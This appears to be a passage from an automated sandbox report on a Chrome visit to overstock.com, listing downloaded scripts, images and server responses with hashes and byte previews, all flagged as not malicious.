                                                                                                                                                                                    Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define([],e):"object"==typeof exports?exports.Statsig=e():t.Statsig=e()}(this,()=>(()=>{"use strict";var $Q=(e)=>Object.defineProperty(e,"__esModule",{value:!0});var $Q2=(a,b,c)=>Object.defineProperty(a,b,c);var $P=(a,b)=>Object.assign(a,b);var $A=()=>((t,r,u,l)=>{return new(u=u||Promise)(function(n,e){function i(t){try{s(l.next(t))}catch(t){e(t)}}function o(t){try{s(l.throw(t))}catch(t){e(t)}}function s(t){var e;t.done?n(t.value):((e=t.value)instanceof u?e:new u(function(t){t(e)})).then(i,o)}s((l=l.apply(t,r||[])).next())})});var i={845:(t,i,e)=>{$Q2(i,"__esModule",{value:!0}),i.t=i.i=i.o=void 0,i.o=()=>__STATSIG__||u,i.i=t=>(0,i.o)()[t];i.t=t=>{var e=(0,i.o)();return t?e.instances&&e.instances[t]:e.lastInstance};var n,s="__STATSIG__",r="undefined"!=typeof window?window:{},e=void 0!==e.g?e.g:{},o="undefined"!=typeof globalThis?globalThis:{};const u=null!=(n=null!=(
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):65
                                                                                                                                                                                    Entropy (8bit):4.314128390879881
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:2erWeKBRk35KLWAzRERxzfRX/H4Y3:29M3tRdfZN
                                                                                                                                                                                    MD5:83A02FE42F8C2198E7C608AFF363AA49
                                                                                                                                                                                    SHA1:7B20AE1014450492CC708E3C9DC7522B05C2EFFD
                                                                                                                                                                                    SHA-256:E64954DC34E12C7190CC2338A54B07644FF0F102AA71CC7209BCBB49C3009F7C
                                                                                                                                                                                    SHA-512:CD381A8C725C892E9A68D713254A31EA9ED25A39B212A5DC52D4BA2655F38AFDDB32519F03360F32A59D8E7701AF6C2AD0030A6AA760C3DE87C75063F5B65F54
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:event: message.data: {"response":{"status_code":200,"body":""}}..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):163
                                                                                                                                                                                    Entropy (8bit):5.335116588616875
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:US9i3USqmKcDXRvFqMPfFQTcZ+1RyUFvNFBIADNHG2JCYWAJDE2JCn+9VRNkTSQ1:UXUoKf8fFGpbdvvB91DMKM+3rkGtSH42
                                                                                                                                                                                    MD5:B37ADEFE65A46E831684783E83EDAEF9
                                                                                                                                                                                    SHA1:CF24CBDE1D7CFE1773CE1F0131973DB90F72B0CA
                                                                                                                                                                                    SHA-256:E4038D5B0B549B4FE73AC5450618E0B45AC1251CE9980DF6BDCDB61A43BA6140
                                                                                                                                                                                    SHA-512:5A975DD2A54EB951930275876CDF35D1DB3237B312B6C52988BAB9897BBA2587585025BC42C6B1E79F52560A1D843913BB5F15E3DD6A6DE5B9CC7C4F4632F996
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ui.powerreviews.com/tag-builds/10461/4.1/js/chunks/760.js
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */."use strict";(self.pwrClg=self.pwrClg||[]).push([[760],{52760:(s,l,r)=>{r.r(l)}}]);
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3128
                                                                                                                                                                                    Entropy (8bit):7.506484784966226
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:UIl/XflLLZCoawTxIOwefQ0hoLsnjDMTl97h2WR97l8jE59egUW76a9CN3Ct+k5A:UIl/X6HaGIRyLKP6dx7Ck9egJOE0T6m
                                                                                                                                                                                    MD5:59EBDAF7D96F7CCEB8824FB85A5CFC75
                                                                                                                                                                                    SHA1:ADFC3CB4A2D0C9BD034206B66332DB027724367D
                                                                                                                                                                                    SHA-256:59EF810D30502F0D881FEF54CEB07052C1CBD3D80796D00CBEB33FDCCAFE53E4
                                                                                                                                                                                    SHA-512:B153FA45A34D30C4AF3918AE82B7D2CAAE29AADC0422E60AFA12D2DC9371A924802DC7FFED23B9EDA317CF499E16E859143A8CE70E543F644C6500834B3B29E2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_9282d52c-facd-46e8-8e06-a48dc5313d2e.jpg?v=1729325107&width=80
                                                                                                                                                                                    Preview:RIFF0...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .....'...*P.P.>1..B.!!..6H ....a...I....h.'.>[/T?..?d?R}.....A.....1.........7.o....%...g...3..Qz.|....<....6R?.ow..........].W..g...3..........0.V.....o....d.Fo....<.)v.?.....4...<.bU..7U{:F.4........V.Nm..i...x...*..~0.O .....{....G+u...O........C....E..*.....-....Z.R5.|..J.s.'x;.. ~.'.O....-......1Z.*.........5Y0.j....s./[Km...5......;..5A....O....*.vG.3....Z..._.#".by.0..@..Gm...P....`xC.L..;.!.KzZ.;...;@..#..q..U4..U9X!g...P)....".....e.*.+.T..Y........Y.e.X.........@..}*L..Q....[i..A.F
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1374
                                                                                                                                                                                    Entropy (8bit):6.530489103486559
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:QTCIl/X2YlXWI2PU2m+b/uEpEpZyyQoI2Mjxk0OJdS1tutj4:1Il/Xfl8xbWEpvPOJ01ej4
                                                                                                                                                                                    MD5:017D14ADF4BEC8A3383BAA7447054CD9
                                                                                                                                                                                    SHA1:4A6F9086BB330552C7035B69AF3DFCF883F09EA7
                                                                                                                                                                                    SHA-256:CE4F0F69A0E788006CF2C3630420B6F51C556FB175F36501BD68AAEB9865B971
                                                                                                                                                                                    SHA-512:D654B6B6D1187110D60625640E1169191275C64F8572A72EE4DA8190D32FFC7CC0D3B6B1969BB2F7852BB83CC3545207CBFAD5CFB4905CAE67B777CF6907624E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_cee71d6b-b4af-4052-a5a5-4a2903281996.jpg?v=1729322885&width=80
                                                                                                                                                                                    Preview:RIFFV...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....P....*P.P.>1..B.!!..u@ ....j'......^.q..o...}..O.......~.8.9...}T.0..jq..|Y\.%.(=.....[:./.....H[...l.P....1.....|.....#...\P.....x...^.`..b..2...J....Z...kM.R.H..|{./.{.....<p..._..7..gv.R6pK*N........p.{a..1.....}.'o..bvy......S{.9.........z....R....F."/.=d.|.G....O....Y....F.p....!...0v.N....dH...G.>.<<+_..x.A......m..W.c_._...d...#O...[....f..V...#x%....C.S.h.....bsl........W.p....f..'..%8d........O.*..+.G.;...._..h....X..........DS.7..g\9...v.(e.><.o.q.Y......VV......}...u......R.W.I..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1985
                                                                                                                                                                                    Entropy (8bit):6.598721591133181
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:rGP/jlvIl/XflAXn9uF1eLCpr/vzX/Q/C1YfTtdQWK4ib:rGzlvIl/XuiOsDYK1YxoRb
                                                                                                                                                                                    MD5:C3955E4FA5B66E02366C16D7D4BDFE78
                                                                                                                                                                                    SHA1:8775BDE8392E05633F76C854AD0619ECE5BAD59E
                                                                                                                                                                                    SHA-256:ED044B58399911FCF88073D286D3DF2CDB367E4CE9B21C82C1AA05061B40A7B3
                                                                                                                                                                                    SHA-512:34CBA0414230179CB6E3BD54C5361AB1B4A94DA739DD0DD65C228925147FBFFC5E113BFCC603D357D4CA2B65F020B2F1A1E21E437B2EB7485FAAB78FDEDD7CF5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_7a289e7d-277b-4b70-bea8-4128c0df03cc.jpg?v=1729325110&width=80
                                                                                                                                                                                    Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm.........4iloc....D@.........................................8iinf..........infe........av01.....infe........Exif.....iprp....ipco....colrrICC....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.............av1C........ispe.......P...P....pixi............ipma...................iref........cdsc..........mdat........d...B2.........+<.~..1..d..|WFr?.$..q7..{..tI..........G...".].m.....`E..A...4p..)...I7h..BH..l....a.-..O.S..~.U9B..SmfkrH...-x.*.Z...M...jgR..w..BX.[.}..a..GDqO..m.....2.T.&.6...h.?C.]t......J.gDgX.dc...`.cU...h..R..?..5...c./..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (32117)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):51984
                                                                                                                                                                                    Entropy (8bit):5.4192491243703405
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:JIF0sxaJJciEVY+7ODTPLhRM8WVQpESqQKsxtLQzavRsLadl0W8M5F4H:ahItZrMRWpEWHQKiqKH
                                                                                                                                                                                    MD5:DB49357F923EC899C9EF90B7DEF907B8
                                                                                                                                                                                    SHA1:480D28152D77EAB20F5992EC0AB5AF15960FFC91
                                                                                                                                                                                    SHA-256:80E528BE853EAC23AF2454534897CA9536B1D3D04AA043B042F34879A3C111C8
                                                                                                                                                                                    SHA-512:88607E0B9619FA59D47B036F0BDF571CD996701774BD7AAF075B63C38590FFD6315551CF361126D4F7E5379A6D635FE3C11283D9560419040254CD217BC544ED
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shopifycloud/shopify/assets/shopify_pay/storefront-80e528be853eac23af2454534897ca9536b1d3d04aa043b042f34879a3c111c8.js?v=20220906
                                                                                                                                                                                    Preview:!function(){var t=function(t){var e={exports:{}};return t.call(e.exports,e,e.exports),e.exports},e=function(t){return function(){var e=t.apply(this,arguments);return new Promise((function(t,r){function n(i,o){try{var a=e[i](o),s=a.value}catch(t){return void r(t)}if(!a.done)return Promise.resolve(s).then((function(t){n("next",t)}),(function(t){n("throw",t)}));t(s)}return n("next")}))}},r=function(t){return t&&t.__esModule?t:{default:t}},n=t((function(t){var e={}.toString;t.exports=function(t){return e.call(t).slice(8,-1)}})),i=t((function(t){var e=t.exports="undefined"!=typeof window&&window.Math==Math?window:"undefined"!=typeof self&&self.Math==Math?self:Function("return this")();"number"==typeof __g&&(__g=e)})),o=t((function(t){var e="__core-js_shared__",r=i[e]||(i[e]={});t.exports=function(t){return r[t]||(r[t]={})}})),a=t((function(t){var e=0,r=Math.random();t.exports=function(t){return"Symbol(".concat(void 0===t?"":t,")_",(++e+r).toString(36))}})),s=t((function(t){var e=o("wks"),r=
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (23092)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):28315
                                                                                                                                                                                    Entropy (8bit):5.250814308268855
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:kcUmVmrm10wXkGQxNV1Z/9WNa/Y1urHFqn10NCMw01invcauUCipwK9tqTPCH0id:kcUmV4m1XXkGQxNV1Z/9WNauurHFqn1t
                                                                                                                                                                                    MD5:4FD0680EED907ADAF3F85849C393D688
                                                                                                                                                                                    SHA1:B37DB94DF8A3F1457DAA5DB860D93772311BA5E4
                                                                                                                                                                                    SHA-256:7AB04D2682AEB63A3FAC2930C5C21A2C922A811A1B32AAFBEF1B58595E0A9E03
                                                                                                                                                                                    SHA-512:5AE518308F079DB8AD1749A6D85BC7B86D9315B660355EAC06D82D683697A23F0AE5415F281449434A86049CF195752B39A33AEBC5ACAAF7317DD7E5606FC82D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/wpm/strict/app/web-pixel-406552735@4fd0680eed907adaf3f85849c393d688.js
                                                                                                                                                                                    Preview:(()=>{var ne=Object.create;var mt=Object.defineProperty;var se=Object.getOwnPropertyDescriptor;var ce=Object.getOwnPropertyNames;var le=Object.getPrototypeOf,ue=Object.prototype.hasOwnProperty;var m=(t,e)=>()=>(t&&(e=t(t=0)),e);var fe=(t,e)=>()=>(e||t((e={exports:{}}).exports,e),e.exports);var de=(t,e,i,a)=>{if(e&&typeof e=="object"||typeof e=="function")for(let o of ce(e))!ue.call(t,o)&&o!==i&&mt(t,o,{get:()=>e[o],enumerable:!(a=se(e,o))||a.enumerable});return t};var pe=(t,e,i)=>(i=t!=null?ne(le(t)):{},de(e||!t||!t.__esModule?mt(i,"default",{value:t,enumerable:!0}):i,t));var r=(t,e,i)=>new Promise((a,o)=>{var s=f=>{try{c(i.next(f))}catch(d){o(d)}},n=f=>{try{c(i.throw(f))}catch(d){o(d)}},c=f=>f.done?a(f.value):Promise.resolve(f.value).then(s,n);c((i=i.apply(t,e)).next())});function ge(){_e(),ye(),Ee(),Oe()}function _e(){try{Object.prototype.entries||Object.defineProperty(Object.prototype,"entries",{configurable:!0,writable:!0,value(){return he(this)}})}catch(t){}}function he(t){return
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                    Entropy (8bit):4.433788517278396
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:RtRqSABJTiANn:RW/TiUn
                                                                                                                                                                                    MD5:026DE9A70714A00E7E790DF61EAB23D4
                                                                                                                                                                                    SHA1:C35CD03D92019422596D3214A5A34DD286FA8EDF
                                                                                                                                                                                    SHA-256:A6FEF6F555B614D586AA39158EAB385417EC069FE9CA0885FF13A5A3891C02E3
                                                                                                                                                                                    SHA-512:3EDA6BB654B1CE9E71A7A3978E8EB1D8EFC156A7191B895C3A0DCA258CF68214E4D182FE148F05866ABB03D0F3F796FE2D68B25F01D62A41BE0B407EE45DD33A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:405 method not allowed, supported: [POST]
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, from Unix, original size modulo 2^32 118
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):133
                                                                                                                                                                                    Entropy (8bit):6.191668872809481
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:FttburmV9938lLpjpfv6cFQOlmhqHEusSo/drQ5+wvcbA5d6b1mStlKQ:XtburmpkdSKmhqHEusbpjbA5dA1mStkQ
                                                                                                                                                                                    MD5:043BF16E8D8FE4817534AAB98BDC4A8E
                                                                                                                                                                                    SHA1:B4291B157B014E51E311DB1DD8EC33840DB905B8
                                                                                                                                                                                    SHA-256:5C6D3A1A777CC6567C88565AE6AC63E5F408A4337AC1E921F14910AA9FB3A0FE
                                                                                                                                                                                    SHA-512:BED29728B2E392EDABBBD9C1B9B65DD132041D9F589677EA05DCD42348B2FE0A39A5D9AE6ECB8E191A0F0B678CE5B6BDC91AD2BFC700AB74641E6551CF6D8B4C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:............K..0......g..Pv=@Y......8r....{..3.~..IY.3A....;.=~:...=6..K.A.....P.....M.y-&..u.....4k4..e.e...MB............ES.Gv...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1978
                                                                                                                                                                                    Entropy (8bit):7.10559866442605
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:fIl/XflWGG8ZLdP4j4boI9QoE/STe82Wa:fIl/X9GCLd44UIaos8env
                                                                                                                                                                                    MD5:7B15D9789E06D13A41E40BB728497794
                                                                                                                                                                                    SHA1:EDFA1D410FB05F7453FC16CCB71E169AF9469678
                                                                                                                                                                                    SHA-256:01DD9358B420F5EDACA0485BFFD6F0D6D435BD21908CABAF1AA5AF0D6AE668C4
                                                                                                                                                                                    SHA-512:5614B61B32CE77A1007F488FE5C9A9E747E56C12FC379D620E377F24804A578FD5EA137CBFF5D7B20B82AE9F39E7C95DD3F4ED4EED8FDC5E4C0DE4F3411AEB27
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_ae5a77ab-5ca2-4c26-bf9e-1470fced3321.jpg?v=1729325182&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 "........*P.P.>1..C"!!.).. ..........;yy..^..0.u..7..U}..L.1.[..m ...&.)..f...<....xQ..p.X{ .l.YL.i.JbM..*../f#./4..Sy&.c6..rU....M$r......z_....,.v.X.. .BVX...2c%.xM.....U..wQ...&........w=m.b-.T...DL.......J.`.*. ..=.+..b...\G.NP.z..z...6............z/T*e.U?.V.......1.n..e...9.....<.....b....{.E...(.5.x....,.........n..R#..wM)tw.?qB..E"gJl...<.!...&J....y.......}.K.R>4.=...oZe...M.g.....O3uD...@....2..!.>.F.&...1..&7t.......C!;..X.+(@....I..(..../$....(_0f..7{L..O._\....nl...y...u.p.....). .7.g]....Xjy.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2572
                                                                                                                                                                                    Entropy (8bit):7.122514885550151
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxvrMAi2b2fQ6j0b7cV+jMEfQBxHKZVFT3p3:NBIl/XrxIAkfQ6W7cV+w2QBxHIVh53
                                                                                                                                                                                    MD5:5AB4A28D44B902DD2D4B32015B86E522
                                                                                                                                                                                    SHA1:5904A2615691DD3531C7DDFD6718512AC5EEE4C5
                                                                                                                                                                                    SHA-256:54CA25AEB8387DF0CD74E27FBC6F777D25EAE7BFFB95289CE00E5EAEF69ABED0
                                                                                                                                                                                    SHA-512:BE3ED59648EEB255DA2B94435FEA2CA15DA479A0898C89E13427679C53D27083450513CA28B5B4D31BDED5575C7E48870D25172ADD4C3BE5C5C760A7DFD858D4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..........................................................................................C..ck..va...&../.6.F......Q2\.!..D.Y_L}...7......S.....2U.q.O..........'I..._.h.p..x..q...y.........B.\........Dmv....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):311259
                                                                                                                                                                                    Entropy (8bit):5.894548727222487
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:XOhITYRGE82Ct5jn6bVf04bCRO3fY1ROhHpwY4CZbGBBPjFOqFK9eFOznkBiCaHm:+kU8G/CRKgMqY4cbkj2Xhc
                                                                                                                                                                                    MD5:290DB41E7F9DEA07628AD5BC9C8F8BD4
                                                                                                                                                                                    SHA1:9A2E2E6D8FF2C217D1C35FC40C5671D15DA4B0DA
                                                                                                                                                                                    SHA-256:C9F8C22BB9A0506980F086913DBCA77358D99EE16939430E2155425FA33A5801
                                                                                                                                                                                    SHA-512:E3B17CD9EB4F9672E5BC1B1BFE6B6CE2DA31A9345EA6C9EA22CA62BB0F35000948AB43A3F2EC90A56884DD5D69B009A8FB6FCBC98E2DD0B7D10CF89A4F1B5026
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function CVdhKIZgGZ(){r9();function jUS(){this["hBS"]^=this["hBS"]>>>16;this.HUS=YmS;}function NS(){var kTS;kTS=AIS()-mGS();return NS=function(){return kTS;},kTS;}E4S();ACS();var tz=function(){cz=[];};var Os=function(){return XY.apply(this,[VM,arguments]);};var zR=function(){return ["J./","L/\x3fb6..\b.IW\'\x00.US1","UB$[^.P","f","!si0si|.h",".RY7L}\'A}.TOk/J) _1.>\n.BB..\vH","^EK4M#(W+...\v",":\x00.R_\r\b.U",".\x40","g.^_k8S>","J\')_:.._.NU\x00.IUS+ZE0","7LK&Zy\x07Q^Z",".AK0FN2BX^$i\x3f-P:\b","84","..\x07.Ow..\nR","6[I",".4.e+GD,M","7LY7O^","S=JO2WC.^","U.S]\tAD\x40W,EO&.\n\'XO.._8\"X8Z..XEWH.\nEY!LNb\x40E.DKV3Xj(^>\b..\fB\x40.F\vSB6\x40N\'.E..^W8\v.*B6.JR\nF\\..J","\'%w=..","\vMK.DCI8h+;B6..","]E.WX.^Mk<L",".HH .\x00BS+","VZi<G.\x3fD","G/NG.]GR1G#",",....Uv\t..","9;US)LD+VG,EDH/J:;S;",".RO)L","GP(X/","(FP4JY.RCS4_3(^>...","tK\x00UOR","\x3fN>*","\x07B..","Q[...OZ,]S!KK.WO","..","w\x07jn\x07em;y`t.f..f.((&-qe0\x3f>GT&MO$DB.ZAS0E%;G-\t.\x07.PJ..T..v..t..J...","95",".\bK[.",".[3%X:\b$..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                    Entropy (8bit):4.301508290129998
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:m8ZJ570T4X7:m+5X7
                                                                                                                                                                                    MD5:AD8B6F08655797587CDEC719A94EFE59
                                                                                                                                                                                    SHA1:182ADF5A140796F81E930649D05654DBF22FD5B7
                                                                                                                                                                                    SHA-256:77D5FE96DEFD6C8C1E3B0466B4827CF83DC7E5C727A10177E115D25132FA86F6
                                                                                                                                                                                    SHA-512:519A8EA7CE2ED8661CC72D58BC0C02E721EF8E64608F4D2E26A56A970D43EBBF21BDF579C543EE1DFD667DA8F87467C60111A3E6D246D435A5C2D066AB88EFA3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:window['google_noFurtherRedirects'] = true;
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1610x894, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):182420
                                                                                                                                                                                    Entropy (8bit):7.998854489098804
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:3072:xCgrjyZX2lOn2uV3dezR0MAbChT8ogzf90qKCdTgcEXJSWionh/K+T0:xCgr2ZjfdCA+oTzfKOLEXtbdj0
                                                                                                                                                                                    MD5:596CC1D5E9A32264C18ED81B6B477DEF
                                                                                                                                                                                    SHA1:E2DF2DD6A09EF32887779CBFED844BC7FCFF70BD
                                                                                                                                                                                    SHA-256:E9E4808C5ECB29CB6A4388FF78D75E16C7230C9D01EA9F26AF5323716DE95BA4
                                                                                                                                                                                    SHA-512:0AC60533E37677BE63817428B5A6D2B66C9654BC8D3EAED0BD14CF04CFA133A90E64053A15E50DFE77362CA3810E8D61C714F47A31FD31B54072376187308005
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/10282024-MOPS-COOP-A2-DSK_.jpg
                                                                                                                                                                                    Preview:RIFF....WEBPVP8 .........*J.~.>.L.K'$#,..LY...en-.Q.*...?......o..A........o..!...........W.........g.......e........u..;.....&...P.........#...W....P....1....2/.....O.4..Z..{..E.?......}.7........ ..................?..9........S................?....S...g.....y.......[..../*?........?....%...?...^.g.......[.......X.........A..a.g..:.,..'.!.d..G.}...J.h...w/.7..3.....;....p.<.t....I....g....(.&..G...S..G..h.... ..0..=..YK.v.Cd P...._........:..~M...3....[v../..Z.!c..b...~.y....*..o...../R1=#.......".*....gLn..B.5...v.$..P..ZU..qc.!e1Of.........D.}....[s......&z$!xES.%K........ .C.@?9..GM....[.sO..F.Q...].B?...[......9. ...J....R...@*.n. .Y.+..l.Q.'!.g..2....F]).....WS.{$.Q..R;/.,....r...!.d.I.}..f....#.'.x.I:........J......8.egJ...P..u.=...../..^......s.H@J3d....].......yNWa.../....U*.....T=.....,.bPXA.6B....^H..I...g.-.\`.......:..5.9.+.&T..,.ZZ...Y...1}O..8..O=[....}.?.a.C....{.sX.n9...-q..i....?1.[.......zi....?.%..O+X>l.Vv..tz...+0B.....~.\.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 87a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):36
                                                                                                                                                                                    Entropy (8bit):3.0708241287951763
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:M3VllRCXk6pswn:ElakCsw
                                                                                                                                                                                    MD5:F729966732570537B1F59424F6F06755
